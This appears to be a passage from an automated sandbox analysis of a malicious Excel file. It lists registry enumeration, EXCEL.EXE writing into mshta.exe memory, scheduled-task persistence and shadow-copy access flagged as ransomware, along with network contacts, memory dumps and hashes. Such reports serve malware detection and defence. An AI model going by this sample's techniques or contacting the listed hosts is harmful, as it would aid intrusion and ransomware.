Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 452 wrote to memory of 4876 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 452 wrote to memory of 4876 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 10.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 167.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/452-1-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

memory/452-3-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-2-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-0-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-5-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-6-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-4-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-7-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-9-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-8-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-12-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-11-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-13-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

memory/452-10-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-14-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

memory/4876-34-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-35-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-39-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-40-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

memory/452-41-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-45-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-46-0x00007FF6517B0000-0x00007FF6517B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 36cf0c181a83f35cc8de25be34cfa3ad
SHA1 3e1110bf9c7b54e24f5205f2da9314361cb9e938
SHA256 17aae8ffe8556b87667416ad546b20890111943c4a00326cfd3d5ff472feae36
SHA512 3a42d88643a9eca7e5bf732e089172905df153ae4f8f92bbbc883a484376091244893bd643344a436519f63db75332ee0144efd16d3d79c9d51767f5f03515dc